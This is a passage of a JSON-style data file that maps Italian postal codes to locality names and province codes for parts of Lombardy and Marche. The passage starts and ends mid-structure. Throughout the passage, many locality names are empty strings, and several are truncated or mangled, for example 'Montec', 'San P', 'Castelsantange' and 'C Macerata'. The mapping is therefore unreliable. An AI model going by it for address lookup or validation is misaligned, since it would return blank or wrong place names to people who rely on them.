["Castelnuovo", "MN"], ["", "MN"]], "46042": [["", "MN"]], "46043": [["Gozzolina", "MN"], ["", "MN"]], "46044": [["Goito", "MN"], ["Cerlongo", "MN"], ["Solarolo", "MN"]], "46045": [["Pozzolo", "MN"], ["Marengo", "MN"], ["Marmirolo", "MN"]], "46046": [["Medole", "MN"]], "46047": [["Soave", "MN"], ["", "MN"], ["Sant'Antonio", "MN"], ["", "MN"]], "46048": [ ["Roverbella", "MN"], ["Malavicina", "MN"], ["", "MN"], ["Canedole", "MN"], ["Pellaloco", "MN"], ], "46049": [["Cereta", "MN"], ["", "MN"]], "46051": [["Bigarello", "MN"], ["", "MN"]], "46100": [ ["", "MN"], ["Lunetta", "MN"], ["Mantova", "MN"], ["Borgovirgiliana", "MN"], ["Formigosa", "MN"], ], "27010": [ ["Gerenzago", "PV"], ["Borgarello", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Giovenzano", "PV"], ["Roncaro", "PV"], ["", "PV"], ["Albuzzano", "PV"], ["Camporinaldo", "PV"], ["", "PV"], ["Giussago", "PV"], ["Zeccone", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Rognano", "PV"], ["Bornasco", "PV"], ["", "PV"], ["Marzano", "PV"], ["Copiano", "PV"], ["", "PV"], ["Vistarino", "PV"], ["Spessa", "PV"], ["Vigonzone", "PV"], ["Inverno", "PV"], ["Bascape'", "PV"], ["", "PV"], ["", "PV"], ["Siziano", "PV"], ["Ceranova", "PV"], ["Linarolo", "PV"], ["Magherno", "PV"], ["Monteleone", "PV"], ["Guinzano", "PV"], ["Filighera", "PV"], ["", "PV"], ["", "PV"], ], "27011": [["Belgioioso", "PV"], ["", "PV"]], "27012": [["Torriano", "PV"], ["", "PV"], ["", "PV"]], "27013": [["Lambrinia", "PV"], ["", "PV"]], "27014": [["Genzone", "PV"], ["Corteolona", "PV"]], "27015": [["Landriano", "PV"]], "27016": [["Lardirago", "PV"], ["", "PV"]], "27017": [["Zerbo", "PV"], ["", "PV"]], "27018": [["Vidigulfo", "PV"]], "27019": [["Villanterio", "PV"]], "27020": [ ["", "PV"], ["Semiana", "PV"], ["Trivolzio", "PV"], ["Zerbolo'", "PV"], ["Marcignago", "PV"], ["Massaua", "PV"], ["Dorno", "PV"], ["Alagna", "PV"], ["", "PV"], ["Cergnago", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Velellina", "PV"], ["Casottole", "PV"], ["Rotta", "PV"], ["Tromello", "PV"], ["Battuda", "PV"], ["Albonese", "PV"], ["Valeggio", "PV"], ["Parona", "PV"], ["", "PV"], ["Breme", "PV"], ["Nicorvo", "PV"], ["Trovo", "PV"], ["Scaldasole", "PV"], ], "27021": [["Bereguardo", "PV"]], "27022": [["Casorate Primo", "PV"]], "27023": [["Cassolnovo", "PV"]], "27024": [["Cilavegna", "PV"]], "27025": [["Gambolo'", "PV"]], "27026": [["", "PV"], ["Garlasco", "PV"], ["", "PV"]], "27027": [["", "PV"]], "27028": [["", "PV"], ["", "PV"]], "27029": 
[["Vigevano", "PV"], ["Sforzesca", "PV"]], "27030": [ ["", "PV"], ["Ottobiano", "PV"], ["Frascarolo", "PV"], ["Langosco", "PV"], ["", "PV"], ["Zeme", "PV"], ["Confienza", "PV"], ["Zinasco", "PV"], ["Rosasco", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Castelnovetto", "PV"], ["", "PV"], ["", "PV"], ["Gambarana", "PV"], ["Suardi", "PV"], ["Cozzo", "PV"], ["Sairano", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Palestro", "PV"], ], "27031": [["", "PV"]], "27032": [["", "PV"]], "27033": [["Garbana", "PV"]], "27034": [["Galliavola", "PV"], ["Lomello", "PV"]], "27035": [["", "PV"], ["Mede", "PV"]], "27036": [["Mortara", "PV"]], "27037": [["", "PV"]], "27038": [["Robbio", "PV"]], "27039": [["", "PV"]], "27040": [ ["Mezzanino", "PV"], ["Bosnasco", "PV"], ["Casatisma", "PV"], ["", "PV"], ["Arena Po", "PV"], ["", "PV"], ["Vallescuropasso", "PV"], ["Rea", "PV"], ["Castana", "PV"], ["", "PV"], ["Montu' Beccaria", "PV"], ["Tornello", "PV"], ["", "PV"], ["Rovescala", "PV"], ["", "PV"], ["Castelletto Po", "PV"], ["", "PV"], ["Portalbera", "PV"], ["", "PV"], ["Casenove", "PV"], ["", "PV"], ["", "PV"], ["Mornico", "PV"], ["Montescano", "PV"], ["Fortunago", "PV"], ["Pometo", "PV"], ["", "PV"], ["Lirio", "PV"], ["", "PV"], ["Campospinoso", "PV"], ["Busca", "PV"], ["", "PV"], ["Calvignano", "PV"], ["Cigognola", "PV"], ], "27041": [["Barbianello", "PV"], ["", "PV"]], "27042": [["", "PV"], ["B", "PV"], ["Bressana", "PV"], ["Bottarone", "PV"]], "27043": [["Broni", "PV"], ["San Cipriano Po", "PV"]], "27044": [["", "PV"], ["Canneto", "PV"]], "27045": [["Casteggio", "PV"]], "27046": [["Santa Giuletta", "PV"]], "27047": [ ["", "PV"], ["Montec", "PV"], ["Golferenzo", "PV"], ["Volpara", "PV"], ], "27048": [["Sommo", "PV"]], "27049": [["Zenevredo", "PV"], ["Stradella", "PV"]], "27050": [ ["Casei", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Pancarana", "PV"], ["", "PV"], ["Corana", "PV"], ["Cervesina", "PV"], ["", "PV"], ["Collegio", "PV"], ["Codevilla", "PV"], ["Romagnese", "PV"], ["Pizzale", "PV"], ["Ghiaie", "PV"], ["", "PV"], ["Retorbido", "PV"], ["", "PV"], ["", "PV"], ["Cecima", "PV"], ["", "PV"], ["Fumo", "PV"], ["", "PV"], ["Redavalle", "PV"], ["", "PV"], ["Menconico", "PV"], ["Bagnaria", "PV"], ["", "PV"], ], "27051": [["", "PV"], ["", "PV"], ["", "PV"]], "27052": [["Montesegale", "PV"], ["Godiasco", "PV"], ["", "PV"], ["", "PV"]], "27053": [["Verretto", "PV"], ["Lungavilla", "PV"]], "27054": [["", "PV"]], "27055": [["Rivanazzano", "PV"]], "27056": [["", "PV"], ["", "PV"], ["Cornale", "PV"]], "27057": [["Pietragavina", "PV"], ["Varzi", "PV"]], "27058": [["Oriolo", "PV"], ["Voghera", "PV"]], "27059": [["Zavattarello", "PV"]], "27061": [["Ruino", "PV"], ["Canevino", "PV"]], "27100": [["", "PV"], ["Ca' ", "PV"], ["Pavia", "PV"], ["Fossarmato", "PV"]], "23010": [ ["Cedrasco", "SO"], ["Rogolo", "SO"], ["Mello", "SO"], ["", "SO"], ["Dazio", "SO"], ["Fusine", "SO"], ["Piantedo", "SO"], ["Rasura", "SO"], ["Civo", "SO"], ["Cevo", "SO"], ["", "SO"], ["Albosaggia", "SO"], [" Val Masino", "SO"], ["", "SO"], ["Cino", "SO"], ["", "SO"], ["Cataeggio", "SO"], ["Pedesina", "SO"], ["", "SO"], ["Pedemonte", "SO"], ["Colorina", "SO"], ["", "SO"], ["", "SO"], ["Tartano", "SO"], ["Villapinta", "SO"], ["Sirta", "SO"], ["", "SO"], ["Bema", "SO"], ["Torchione", "SO"], ["", "SO"], ["Moia", "SO"], ["Forcola", "SO"], ["Caiolo", "SO"], ["Postalesio", "SO"], ], "23011": [["Ardenno", "SO"]], "23012": [["", "SO"]], "23013": [["Regoledo", "SO"], ["Sacco", "SO"], ["", "SO"], ["", "SO"]], "23014": [["", "SO"], 
["Delebio", "SO"]], "23015": [["Dubino", "SO"], ["", "SO"]], "23016": [["Cercino", "SO"], ["Mantello", "SO"]], "23017": [["Campovico", "SO"], ["Morbegno", "SO"]], "23018": [["Talamona", "SO"]], "23019": [["Traona", "SO"]], "23020": [ ["Caspoggio", "SO"], ["Verceia", "SO"], ["Gordona", "SO"], ["Prasomaso", "SO"], ["Boffetto", "SO"], ["", "SO"], ["Mese", "SO"], ["", "SO"], ["Piuro", "SO"], ["", "SO"], ["Menarola", "SO"], ["Piateda", "SO"], ["Tresivio", "SO"], ["Lirone", "SO"], ["Poggiridenti", "SO"], ["Spriana", "SO"], ["Lanzada", "SO"], ["", "SO"], ["", "SO"], ["", "SO"], ["", "SO"], ["Santa Croce", "SO"], ["Prosto", "SO"], ["", "SO"], ["Santa Croce Di Piuro", "SO"], ], "23021": [["Campodolcino", "SO"], ["Fraciscio", "SO"]], "23022": [["Bette", "SO"], ["Chiavenna", "SO"]], "23023": [["Primolo", "SO"], ["Chiareggio", "SO"], [" Valmalenco", "SO"]], "23024": [["Isola", "SO"], ["Pianazzo", "SO"], ["Madesimo", "SO"], ["Montespluga", "SO"]], "23025": [["Novola", "SO"], ["Campo", "SO"]], "23026": [["Ponte In Valtellina", "SO"], ["Arigna", "SO"]], "23027": [ ["San P", "SO"], ["Somaggia", "SO"], ["Era", "SO"], ["Era Samolaco", "SO"], ["San Pietro", "SO"], ["Samolaco", "SO"], ], "23029": [["", "SO"], ["Dogana", "SO"], ["", "SO"]], "23030": [ ["", "SO"], ["", "SO"], ["Piatta", "SO"], ["Livigno", "SO"], ["' Di Valfurva", "SO"], ["Trepalle", "SO"], ["Valfurva", "SO"], ["", "SO"], ["Stazzona", "SO"], ["", "SO"], ["", "SO"], ["Valdisotto", "SO"], ["Santa Caterina", "SO"], ["Sant'Antonio", "SO"], ["Lovero", "SO"], ["Castionetto", "SO"], ["Santa ", "SO"], ["Sernio", "SO"], ["Bianzone", "SO"], ["Cepina", "SO"], ["Chiuro", "SO"], ["Vervio", "SO"], ], "23031": [["Aprica", "SO"]], "23032": [["", "SO"], ["Bormio", "SO"]], "23033": [["Tiolo", "SO"], ["Ravoledo", "SO"], ["Grosio", "SO"]], "23034": [["Grosotto", "SO"]], "23035": [ ["", "SO"], ["Frontale", "SO"], ["", "SO"], ["", "SO"], ["Sondalo", "SO"], ["Mondadizza", "SO"], ["", "SO"], ["Le Prese", "SO"], ["Pendosso", "SO"], ], "23036": [["Teglio", "SO"], ["", "SO"], ["", "SO"], ["Tresenda", "SO"]], "23037": [["", "SO"], ["Tirano", "SO"]], "23038": [ ["Isolaccia", "SO"], ["Semogo", "SO"], ["", "SO"], ["", "SO"], ["Valdidentro", "SO"], ], "23100": [ ["Ponchiera", "SO"], ["Sant'Anna", "SO"], ["Albosaggia", "SO"], ["Mossini", "SO"], ["Sondrio", "SO"], ["Faedo", "SO"], ["Triangia", "SO"], ], "21010": [ ["", "VA"], ["", "VA"], ["Muceno", "VA"], ["Calde'", "VA"], ["", "VA"], ["Nasca", "VA"], ["Castelveccana", "VA"], ["Domo", "VA"], ["Germignaga", "VA"], ["Castello", "VA"], ["", "VA"], ["Ligurno", "VA"], ["", "VA"], ["", "VA"], ["", "VA"], ["Golasecca", "VA"], ["", "VA"], ["Ferno", "VA"], ["Besnate", "VA"], ["Dumenza", "VA"], ["Veddasca", "VA"], ["", "VA"], ["Agra", "VA"], ["", "VA"], ["", "VA"], ], "21011": [["", "VA"]], "21012": [["", "VA"]], "21013": [["Gallarate", "VA"], ["Crenna", "VA"], ["Cedrate", "VA"]], "21014": [["", "VA"], ["Mombello", "VA"], ["Laveno", "VA"]], "21015": [["", "VA"], ["Tornavento", "VA"], ["", "VA"]], "21016": [["Voldomino", "VA"], ["Poppino", "VA"], ["Creva", "VA"], ["Luino", "VA"]], "21017": [["", "VA"], ["Verghera", "VA"], ["", "VA"], ["Samarate", "VA"]], "21018": [["", "VA"], ["Lisanza", "VA"]], "21019": [ ["", "VA"], ["", "VA"], ["Coarezza", "VA"], ["Maddalena", "VA"], ["Case Nuove", "VA"], ], "21020": [ ["Villadosia", "VA"], ["Barasso", "VA"], ["Montonate", "VA"], ["", "VA"], ["Taino", "VA"], ["Ternate", "VA"], ["Bregano", "VA"], ["Daverio", "VA"], ["Inarzo", "VA"], ["", "VA"], ["Bodio", "VA"], ["", "VA"], ["Mornago", "VA"], 
["Buguggiate", "VA"], ["", "VA"], ["Ranco", "VA"], ["", "VA"], ["", "VA"], ["Comabbio", "VA"], ["Mercallo", "VA"], ["Brebbia", "VA"], ["Crugnola", "VA"], ["Monvalle", "VA"], ["Malgesso", "VA"], ["Luvinate", "VA"], ["Lomnago", "VA"], ["Bernate", "VA"], ["Bardello", "VA"], ["Brunello", "VA"], ["Casciago", "VA"], ], "21021": [["Angera", "VA"]], "21022": [["Azzate", "VA"]], "21023": [["Besozzo", "VA"]], "21024": [["Biandronno", "VA"]], "21025": [["Comerio", "VA"]], "21026": [["", "VA"], ["Gavirate", "VA"]], "21027": [["Ispra", "VA"], ["Ispra Centro Euratom", "VA"], ["Barza", "VA"]], "21028": [["Travedona Monate", "VA"]], "21029": [["Cimbro", "VA"], ["Cuirone", "VA"], ["Corgeno", "VA"], ["Vergiate", "VA"]], "21030": [ ["", "VA"], ["Brenta", "VA"], ["Cugliate", "VA"], ["", "VA"], ["Mesenzana", "VA"], ["Brinzio", "VA"], ["", "VA"], ["", "VA"], ["", "VA"], ["Fabiasco", "VA"], ["Marchirolo", "VA"], ["Azzio", "VA"], ["Orino", "VA"], ["Marzio", "VA"], ["Duno", "VA"], ["Casalzuigno", "VA"], ["Grantola", "VA"], ["Cremenaga", "VA"], ["", "VA"], ["Cuveglio", "VA"], ["Cuvio", "VA"], ["", "VA"], ], "21031": [["", "VA"], ["Viconago", "VA"], ["Cadegliano", "VA"]], "21032": [["Caravate", "VA"]], "21033": [["Cittiglio", "VA"]], "21034": [["Caldana", "VA"], ["Trevisago", "VA"], ["", "VA"], ["Cocquio", "VA"]], "21035": [["Cunardo", "VA"]], "21036": [["Gemonio", "VA"]], "21037": [["", "VA"], ["", "VA"]], "21038": [["Leggiuno", "VA"], ["Sangiano", "VA"]], "21039": [["", "VA"], ["Valganna", "VA"], ["Ganna", "VA"], ["Ghirla", "VA"]], "21040": [ ["", "VA"], ["", "VA"], ["Venegono Superiore", "VA"], ["", "VA"], ["", "VA"], ["Castronno", "VA"], ["Oggiona", "VA"], ["Morazzone", "VA"], ["Cislago", "VA"], ["", "VA"], ["Origgio", "VA"], ["", "VA"], ["", "VA"], ["Sumirago", "VA"], ["Uboldo", "VA"], ["Massina", "VA"], ["Carnago", "VA"], ["Lozza", "VA"], ["Rovate", "VA"], ["Venegono Inferiore", "VA"], ["Gerenzano", "VA"], ], "21041": [["Albizzate", "VA"]], "21042": [["", "VA"]], "21043": [["", "VA"], ["", "VA"]], "21044": [["", "VA"]], "21045": [["Schianno", "VA"], ["Gazzada", "VA"], ["", "VA"]], "21046": [["Malnate", "VA"], ["San Salvatore", "VA"]], "21047": [["Saronno", "VA"]], "21048": [["", "VA"], ["Monte", "VA"]], "21049": [["", "VA"], ["Tradate", "VA"]], "21050": [ ["Marnate", "VA"], ["Brusimpiano", "VA"], ["", "VA"], ["", "VA"], ["Besano", "VA"], ["Bolladello", "VA"], ["", "VA"], ["", "VA"], ["Clivio", "VA"], ["Cairate", "VA"], ["Saltrio", "VA"], ["", "VA"], ["Gaggiolo", "VA"], ["Bisuschio", "VA"], ["Cavagnano", "VA"], ["Castelseprio", "VA"], ["Cantello", "VA"], ], "21051": [["", "VA"], ["Arcisate", "VA"]], "21052": [["Sacconago", "VA"], ["Borsano", "VA"], ["", "VA"]], "21053": [["Castellanza", "VA"]], "21054": [["", "VA"], ["Bergoro", "VA"]], "21055": [["", "VA"]], "21056": [["", "VA"]], "21057": [["'", "VA"], ["Olgiate Olona", "VA"]], "21058": [["Solbiate Olona", "VA"]], "21059": [["Baraggia", "VA"], ["Viggiu'", "VA"]], "21061": [["Maccagno Con Pino E Veddasca", "VA"], ["Maccagno", "VA"]], "21062": [["Osmate", "VA"], ["Cadrezzate", "VA"]], "21100": [ ["Rasa", "VA"], ["Rasa Di Velate", "VA"], ["Cartabbia", "VA"], ["", "VA"], ["", "VA"], ["Bizzozero", "VA"], ["", "VA"], ["", "VA"], ["Varese", "VA"], ["Capolago", "VA"], ["Masnago", "VA"], ["Casbeno", "VA"], ], "60010": [ ["Ostra", "AN"], ["", "AN"], ["Vaccarile", "AN"], ["Barbara", "AN"], ["Casine", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Pianello", "AN"], ], "60011": [ ["", "AN"], ["", "AN"], ["Arcevia", "AN"], ["Nidastore", "AN"], ["Piticchio", "AN"], ["Palazzo", 
"AN"], ["", "AN"], ["Avacelli", "AN"], ["Castiglioni", "AN"], ["Montefortino", "AN"], ], "60012": [ ["", "AN"], ["Ripe", "AN"], ["Monterado", "AN"], ["Brugnetto", "AN"], ["Trecastelli", "AN"], ["", "AN"], ["", "AN"], ], "60013": [["Corinaldo", "AN"]], "60015": [["Castelferretti", "AN"], ["", "AN"], ["", "AN"]], "60018": [["", "AN"], ["Lungomare", "AN"], ["Montemarciano", "AN"]], "60019": [ ["", "AN"], ["", "AN"], ["Montignano", "AN"], ["Marzocca", "AN"], ["Sant'Angelo", "AN"], ["Vallone", "AN"], ["Roncitelli", "AN"], ["", "AN"], ["Senigallia", "AN"], ["Scapezzano", "AN"], ], "60020": [ ["Sirolo", "AN"], ["Agugliano", "AN"], ["Offagna", "AN"], ["Polverigi", "AN"], ["", "AN"], ["", "AN"], ], "60021": [["Camerano", "AN"], ["", "AN"]], "60022": [["", "AN"], ["", "AN"], ["Castelfidardo", "AN"]], "60024": [["Montoro", "AN"], ["Filottrano", "AN"]], "60025": [["", "AN"], ["L", "AN"], ["Loreto", "AN"]], "60026": [["Numana", "AN"], ["Marcelli", "AN"], ["", "AN"]], "60027": [ ["Passatempo", "AN"], ["", "AN"], ["Casenuove", "AN"], ["Padiglione", "AN"], ["Campocavallo", "AN"], ["Osimo", "AN"], ["", "AN"], ["San Biagio", "AN"], ], "60030": [ ["", "AN"], ["", "AN"], ["Mergo", "AN"], ["Monsano", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Rosora", "AN"], ["Angeli", "AN"], ["", "AN"], ["Castelbellino", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Stazione", "AN"], ["Osteria", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Moie", "AN"], ], "60031": [["Castelplanio", "AN"], ["", "AN"], ["Macine", "AN"], ["", "AN"]], "60033": [["Chiaravalle", "AN"], ["Grancetta", "AN"]], "60034": [["Cupramontana", "AN"]], "60035": [["Jesi", "AN"]], "60036": [["Montecarotto", "AN"]], "60037": [["", "AN"], ["Borghetto", "AN"], ["", "AN"]], "60038": [["", "AN"]], "60039": [["Staffolo", "AN"]], "60040": [ ["Trinquelli", "AN"], ["", "AN"], ["Colleponi", "AN"], ["", "AN"], ["Genga", "AN"], ], "60041": [ ["Cabernardi", "AN"], ["", "AN"], ["Monterosso Stazione", "AN"], ["Sassoferrato", "AN"], ["Monterosso", "AN"], ["Perticano", "AN"], ["", "AN"], ], "60043": [["", "AN"]], "60044": [ ["Sant'Elia", "AN"], ["Castelletta", "AN"], ["Serradica", "AN"], ["Melano", "AN"], ["", "AN"], ["Fabriano", "AN"], ["Attiggio", "AN"], ["Nebbiano", "AN"], ["", "AN"], ["", "AN"], ["Marischio", "AN"], ["", "AN"], ["Campodonico", "AN"], ["Albacina", "AN"], ["Argignano", "AN"], ["Cancelli", "AN"], ["Collamato", "AN"], ["", "AN"], ], "60048": [ ["Castellaro", "AN"], ["Serra San Quirico Stazione", "AN"], ["Domo", "AN"], ["Serra San Quirico", "AN"], ["Sasso", "AN"], ], "60100": [["Ancona", "AN"]], "60121": [["Ancona", "AN"]], "60122": [["Ancona", "AN"]], "60123": [["Ancona", "AN"]], "60124": [["Ancona", "AN"]], "60125": [["Ancona", "AN"]], "60126": [["Ancona", "AN"]], "60127": [["Ancona", "AN"], ["Pinocchio", "AN"]], "60128": [["Ancona", "AN"]], "60129": [["Ancona", "AN"], ["Varano", "AN"], ["Pietralacroce", "AN"], ["Poggio", "AN"]], "60131": [["Ancona", "AN"], ["Montesicuro", "AN"]], "63020": [["", "AP"]], "63031": [["", "AP"]], "63061": [["Massignano", "AP"]], "63062": [["", "AP"]], "63063": [["Carassai", "AP"]], "63064": [["", "AP"]], "63065": [["", "AP"], ["Ripatransone", "AP"]], "63066": [["Ischia", "AP"], ["Grottammare", "AP"]], "63067": [["Cossignano", "AP"]], "63068": [["Porchia", "AP"], ["Patrignone", "AP"], ["", "AP"]], "63069": [["Montedinove", "AP"]], "63071": [["Rotella", "AP"], ["", "AP"]], "63072": [["Castignano", "AP"], ["Ripaberarda", "AP"]], "63073": [["Offida", "AP"]], "63074": [["San Benedetto Del Tronto", "AP"], ["", "AP"]], "63075": [["", 
"AP"]], "63076": [["Centobuchi", "AP"], ["Monteprandone", "AP"]], "63077": [["", "AP"], ["", "AP"]], "63078": [["Pagliare", "AP"], ["Spinetoli", "AP"]], "63079": [["", "AP"], ["", "AP"]], "63081": [["Castorano", "AP"], ["", "AP"]], "63082": [ ["", "AP"], ["", "AP"], ["Piattoni", "AP"], ["", "AP"], ], "63083": [["", "AP"]], "63084": [["Folignano", "AP"], ["", "AP"], ["", "AP"], ["", "AP"]], "63085": [["Caselle", "AP"], ["Maltignano", "AP"]], "63086": [["Force", "AP"]], "63087": [["Comunanza", "AP"], ["", "AP"]], "63088": [["Montemonaco", "AP"]], "63091": [["Venarotta", "AP"]], "63092": [["Palmiano", "AP"]], "63093": [["Roccafluvione", "AP"], ["Marsia", "AP"], ["Agelli", "AP"]], "63094": [["Montegallo", "AP"], ["Bisignano", "AP"]], "63095": [ ["Quintodecimo", "AP"], ["", "AP"], ["Paggese", "AP"], ["", "AP"], ["", "AP"], ["", "AP"], ["Tallacano", "AP"], ], "63096": [ ["Pretare", "AP"], ["Spelonga", "AP"], ["Pescara Del Tronto", "AP"], ["Trisungo", "AP"], ["Arquata Del Tronto", "AP"], ["Capodacqua", "AP"], ], "63100": [ ["", "AP"], ["", "AP"], ["Piagge", "AP"], ["Venagrande", "AP"], ["Mozzano", "AP"], ["Lisciano", "AP"], ["", "AP"], ["Monticelli", "AP"], ["", "AP"], ["Campolungo", "AP"], ["", "AP"], ["", "AP"], ], "63811": [ ["Castellano", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["Cretarola", "FM"], ["Cascinare", "FM"], ], "63812": [["Montegranaro", "FM"]], "63813": [["", "FM"]], "63814": [["", "FM"]], "63815": [["", "FM"]], "63816": [["", "FM"]], "63821": [["", "FM"]], "63822": [["", "FM"]], "63823": [["Lapedona", "FM"]], "63824": [["", "FM"], ["Altidona", "FM"]], "63825": [["Rubbianello", "FM"], ["Monterubbiano", "FM"]], "63826": [["Moresco", "FM"]], "63827": [["Pedaso", "FM"]], "63828": [["Campofilone", "FM"]], "63831": [["", "FM"], ["Rapagnano", "FM"]], "63832": [["", "FM"]], "63833": [["Montegiorgio", "FM"], ["", "FM"], ["Alteta", "FM"]], "63834": [["", "FM"]], "63835": [["Montappone", "FM"]], "63836": [["", "FM"]], "63837": [["Falerone", "FM"], ["Piane", "FM"]], "63838": [["", "FM"]], "63839": [["Curetta", "FM"], ["Servigliano", "FM"]], "63841": [["", "FM"]], "63842": [["", "FM"], ["", "FM"]], "63843": [["Montottone", "FM"]], "63844": [["Grottazzolina", "FM"]], "63845": [["Capparuccia", "FM"], ["", "FM"], ["Torchiaro", "FM"]], "63846": [["", "FM"]], "63847": [["", "FM"]], "63848": [["Moregnano", "FM"], ["Petritoli", "FM"]], "63851": [["Ortezzano", "FM"]], "63852": [["", "FM"]], "63853": [["Montelparo", "FM"]], "63854": [["Santa Vittoria In Matenano", "FM"]], "63855": [["", "FM"]], "63856": [["", "FM"], ["Smerillo", "FM"]], "63857": [["Amandola", "FM"]], "63858": [["Santa Lucia In Consilvano", "FM"], ["Montefortino", "FM"]], "63900": [ ["Salvano", "FM"], ["", "FM"], ["Campiglione", "FM"], ["", "FM"], ["Capodarco", "FM"], ["Caldarette", "FM"], ["Fermo", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ], "62010": [ ["Trodica", "MC"], ["Morrovalle", "MC"], ["Montefano", "MC"], ["Appignano", "MC"], ["Sant'Egidio", "MC"], ["", "MC"], ["", "MC"], ["", "MC"], ["Montecassiano", "MC"], ["Urbisaglia", "MC"], ["", "MC"], ["Pollenza", "MC"], ["Mogliano", "MC"], ["", "MC"], ["Sambucheto", "MC"], ["Montecosaro", "MC"], ["Pintura", "MC"], ["Santa Maria In Selva", "MC"], ["", "MC"], ["Chiesanuova", "MC"], ["Treia", "MC"], ["Montelupone", "MC"], ], "62011": [ ["", "MC"], ["Moscosi", "MC"], ["Avenale", "MC"], ["Troviggiano", "MC"], ["", "MC"], ["", "MC"], ["Torre", "MC"], ["Strada", "MC"], ["Cingoli", "MC"], ["Grottaccia", "MC"], ], "62012": [ ["Fontespina", "MC"], 
["Civitanova Alta", "MC"], ["Civitanova Marche Alta", "MC"], ["Civitanova Marche", "MC"], ["", "MC"], ], "62014": [ ["Corridonia", "MC"], ["Petriolo", "MC"], ["", "MC"], ["", "MC"], ["Colbuccaro", "MC"], ], "62015": [["", "MC"], ["", "MC"]], "62017": [["Port", "MC"]], "62018": [["Potenza Picena", "MC"], ["Porto Potenza Picena", "MC"]], "62019": [["Recanati", "MC"], ["Musone", "MC"]], "62020": [ ["", "MC"], ["Serrapetrona", "MC"], ["Caldarola", "MC"], ["", "MC"], ["Cessapalombo", "MC"], ["", "MC"], ["Gualdo", "MC"], ["", "MC"], ["", "MC"], ["", "MC"], ["Colmurano", "MC"], ["Valcimarra", "MC"], ["", "MC"], ], "62021": [["Frontale", "MC"], ["", "MC"], ["Apiro", "MC"]], "62022": [["Gagliole", "MC"], ["Castelraimondo", "MC"], ["Crispiero", "MC"]], "62024": [["Colferraio", "MC"], ["Esanatoglia", "MC"], ["Matelica", "MC"]], "62025": [ ["Seppio", "MC"], ["Massa", "MC"], ["Sefro", "MC"], ["Fiuminata", "MC"], ["Fonte Di Brescia", "MC"], ["Pioraco", "MC"], ], "62026": [["", "MC"], ["", "MC"], ["", "MC"]], "62027": [["", "MC"], ["Cesolo", "MC"], ["", "MC"]], "62028": [["Sarnano", "MC"]], "62029": [["Tolentino", "MC"]], "62032": [ ["", "MC"], ["Polverina", "MC"], ["Morro", "MC"], ["", "MC"], ["Mergnano", "MC"], ["Camerino", "MC"], ], "62034": [["Muccia", "MC"]], "62035": [ ["Pievebovigliana", "MC"], ["Acquacanina", "MC"], ["Fiordimonte", "MC"], ["Fiegni", "MC"], ["Bolognola", "MC"], ["Fiastra", "MC"], ], "62036": [ ["Casavecchia", "MC"], ["", "MC"], ["Pie' Casavecchia", "MC"], ["", "MC"], ["Appennino", "MC"], ], "62038": [["Serravalle Di Chienti", "MC"], ["Cesi", "MC"], ["C Macerata", "MC"]], "62039": [["Visso", "MC"], ["Ussita", "MC"], ["Castelsantange", "MC"], ["Fematre", "MC"]], "62100": [ ["", "MC"], ["", "MC"], ["Macerata", "MC"], ["Sforzacosta", "MC"], ["Corridonia Stazione", "MC"], ["Piediripa", "MC"], ], "61010": [ ["", "PU"], ["Case Bernardi", "PU"], ["", "PU"], ["", "PU"], ["", "PU"], ["Montegrimano", "PU"], ["Tavullia", "PU"], ["Padiglione", "PU"], ["Montelicciano", "PU"], ["", "PU"], ], "61011": [["", "PU"], ["Case Badioli", "PU"]], "61012": [["Fanano", "PU"], ["Gradara", "PU"]], "61013": [ ["", "PU"], ["Piandicastello", "PU"], ["", "PU"], ["", "PU"], ["Sassofeltrio", "PU"], ], "61014": [["", "PU"], ["Montecopiolo", "PU"], ["Villagrande", "PU"]], "61020": [ ["Casinina", "PU"], ["", "PU"], ["Gallo", "PU"], ["", "PU"], ["Petriano", "PU"], ["Ca' Gallo", "PU"], ["", "PU"], ["Tavoleto", "PU"], ], "61021": [["Frontino", "PU"], ["Carpegna", "PU"]], "61022": [ ["", "PU"], ["Vallefoglia", "PU"], ["Colbordolo", "PU"], ["Morciola", "PU"], ["Bottega", "PU"], ["Montecchio", "PU"], ], "61023": [["", "PU"], ["Pietrarubbia", "PU"]], "61024": [["Mombaroccio", "PU"], ["Monteciccardo", "PU"]], "61025": [["Montelabbate", "PU"], ["", "PU"]], "61026": [ ["Lunano", "PU"], ["", "PU"], ["Monastero", "PU"], ["Piandimeleto", "PU"], ["", "PU"], ], "61028": [["Caprazzino", "PU"], ["Mercatale", "PU"], ["Sassocorvaro", "PU"], ["Auditore", "PU"]], "61029": [ ["", "PU"], ["Schieti", "PU"], ["Gadana", "PU"], ["Trasanni", "PU"], ["", "PU"], ["Urbino", "PU"], ["", "PU"], ["Castelcavallino", "PU"], ["", "PU"], ["Canavaccio", "PU"], ], "61030": [ ["Serrungarina", "PU"], ["", "PU"], ["Calcinelli", "PU"], ["Cartoceto", "PU"], ["", "PU"], ["Tavernelle", "PU"], ["", "PU"], ["Monteguiduccio", "PU"], ["Villanova", "PU"], ["Piagge", "PU"], ["Saltara", "PU"], ["Montefelcino", "PU"], ["Lucrezia", "PU"], ], "61032": [["Fenile", "PU"], ["Cuccurano", "PU"], ["Bellocchi", "PU"], ["Fano", "PU"]], "61033": [["Fermignano", "PU"]], "61034": 
